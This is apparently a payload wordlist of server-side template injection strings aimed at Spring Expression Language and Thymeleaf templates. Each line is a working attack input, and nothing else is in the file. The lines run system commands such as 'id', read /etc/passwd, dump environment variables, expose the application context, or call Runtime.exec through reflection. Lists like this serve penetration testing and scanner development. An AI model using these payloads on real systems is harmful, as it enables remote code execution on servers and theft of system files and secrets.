__${T(java.lang.Runtime).getRuntime().exec("id")}__::.x
${T(java.lang.Runtime).getRuntime().exec("id")}
${T(java.lang.Runtime).getRuntime().exec(new String[]{"cat","/etc/passwd"})}
#{T(java.lang.Runtime).getRuntime().exec("id")}
*{T(java.lang.Runtime).getRuntime().exec("id")}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec("id").getInputStream())}
${T(java.lang.System).getenv()}
${T(java.lang.System).getenv("PATH")}
${applicationContext}
${T(java.lang.Class).forName("java.lang.Runtime").getMethod("exec",T(String)).invoke(T(java.lang.Runtime).getRuntime(),"id")}
